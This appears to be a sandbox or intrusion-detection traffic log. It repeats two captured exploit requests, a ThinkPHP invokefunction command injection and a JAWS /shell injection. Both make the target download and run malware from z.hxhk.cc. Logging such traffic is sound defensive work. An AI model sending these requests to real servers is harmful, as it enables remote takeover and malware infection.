Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: r00ts3c-owned-you
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
